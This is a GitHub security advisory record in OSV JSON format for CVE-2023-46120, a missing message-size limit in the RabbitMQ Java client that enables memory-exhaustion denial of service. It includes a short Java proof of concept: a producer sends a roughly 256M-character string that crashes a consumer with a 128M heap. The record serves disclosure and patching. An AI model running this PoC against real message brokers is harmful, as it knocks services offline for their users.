{"id":"GHSA-mm8h-8587-p46h","summary":"RabbitMQ Java client's Lack of Message Size Limitation leads to Remote DoS Attack","details":"### Summary\n`maxBodyLebgth` was not used when receiving Message objects.  Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.\n\n### PoC\n#### RbbitMQ\n* Use RabbitMQ 3.11.16 as MQ and specify Message Body size 512M (here it only needs to be larger than the Consumer memory)\n* Start RabbitMQ\n#### Producer\n* Build a String of length 256M and send it to Consumer\n```\n\npackage org.springframework.amqp.helloworld; \n\nimport org.springframework.amqp.core.AmqpTemplate; \nimport org.springframework.context.ApplicationContext; \nimport org.springframework.context.annotation.AnnotationConfigApplicationContext; \n\npublic class Producer {\n    public static void main(String[] args) {\n        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);\n        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class); \n        String s = \"A\";\n        for(int i=0;i\u003c28;++i){\n            s = s + s;\n            System.out.println(i);\n        }\n        amqpTemplate.convertAndSend(s);\n        System.out.println(\"Send Finish\");\n    }\n }\n```\n\n#### Consumer\n* First set the heap memory size to 128M\n* Read the message sent by the Producer from the MQ and print the length\n```\npackage org.springframework.amqp.helloworld;\n\nimport org.springframework.amqp.core.AmqpTemplate;\nimport org.springframework.amqp.core.Message;\nimport org.springframework.context.ApplicationContext;\nimport org.springframework.context.annotation.AnnotationConfigApplicationContext;\n\npublic class Consumer {\n    \n    public static void main(String[] args) {\n        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);\n        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);\n        Object o = amqpTemplate.receiveAndConvert();\n        if(o != null){\n            String s = o.toString();\n            System.out.println(\"Received Length : \" + s.length());\n        }else{\n            System.out.println(\"null\");\n        }\n    }\n}\n```\n#### Results\n* Run the Producer first, then the Consumer\n* Consumer throws OOM Exception\n\n\n### Impact\nUsers of RabbitMQ may suffer from  DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.\n","aliases":["CVE-2023-46120"],"modified":"2026-07-17T21:05:23.352847159Z","published":"2023-10-24T01:49:09Z","database_specific":{"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2023-10-24T01:49:09Z","nvd_published_at":"2023-10-25T18:17:36Z","cwe_ids":["CWE-400"]},"references":[{"type":"WEB","url":"https://github.com/rabbitmq/rabbitmq-java-client/security/advisories/GHSA-mm8h-8587-p46h"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-46120"},{"type":"WEB","url":"https://github.com/rabbitmq/rabbitmq-java-client/issues/1062"},{"type":"WEB","url":"https://github.com/rabbitmq/rabbitmq-java-client/commit/714aae602dcae6cb4b53cadf009323ebac313cc8"},{"type":"PACKAGE","url":"https://github.com/rabbitmq/rabbitmq-java-client"},{"type":"WEB","url":"https://github.com/rabbitmq/rabbitmq-java-client/releases/tag/v5.18.0"}],"affected":[{"package":{"name":"com.rabbitmq:amqp-client","ecosystem":"Maven","purl":"pkg:maven/com.rabbitmq/amqp-client"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"5.18.0"}]}],"versions":["1.3.0","1.5.4","1.5.5","1.6.0","1.7.2","1.8.0","1.8.1","2.0.0","2.1.0","2.1.1","2.2.0","2.3.0","2.3.1","2.4.1","2.5.0","2.5.1","2.6.0","2.6.1","2.7.0","2.7.1","2.8.0","2.8.1","2.8.2","2.8.3","2.8.4","2.8.5","2.8.6","2.8.7","3.0.0","3.0.1","3.0.2","3.0.3","3.0.4","3.1.0","3.1.1","3.1.2","3.1.3","3.1.4","3.2.0","3.2.1","3.2.2","3.2.3","3.2.4","3.3.0","3.3.1","3.3.2","3.3.3","3.3.4","3.3.5","3.4.0","3.4.1","3.4.2","3.4.3","3.4.4","3.5.0","3.5.1","3.5.2","3.5.3","3.5.4","3.5.5","3.5.6","3.5.7","3.6.0","3.6.1","3.6.2","3.6.3","3.6.4","3.6.5","3.6.6","4.0.0","4.0.1","4.0.2","4.0.3","4.1.0","4.1.1","4.10.0","4.11.0","4.11.1","4.11.2","4.11.3","4.12.0","4.2.0","4.2.1","4.2.2","4.3.0","4.4.0","4.4.1","4.4.2","4.5.0","4.6.0","4.7.0","4.8.0","4.8.1","4.8.2","4.8.3","4.9.0","4.9.1","4.9.2","4.9.3","5.0.0","5.1.0","5.1.1","5.1.2","5.10.0","5.11.0","5.12.0","5.13.0","5.13.1","5.14.0","5.14.1","5.14.2","5.14.3","5.15.0","5.16.0","5.16.1","5.17.0","5.17.1","5.2.0","5.3.0","5.4.0","5.4.1","5.4.2","5.4.3","5.5.0","5.5.1","5.5.2","5.5.3","5.6.0","5.7.0","5.7.1","5.7.2","5.7.3","5.8.0","5.9.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-mm8h-8587-p46h/GHSA-mm8h-8587-p46h.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"}]}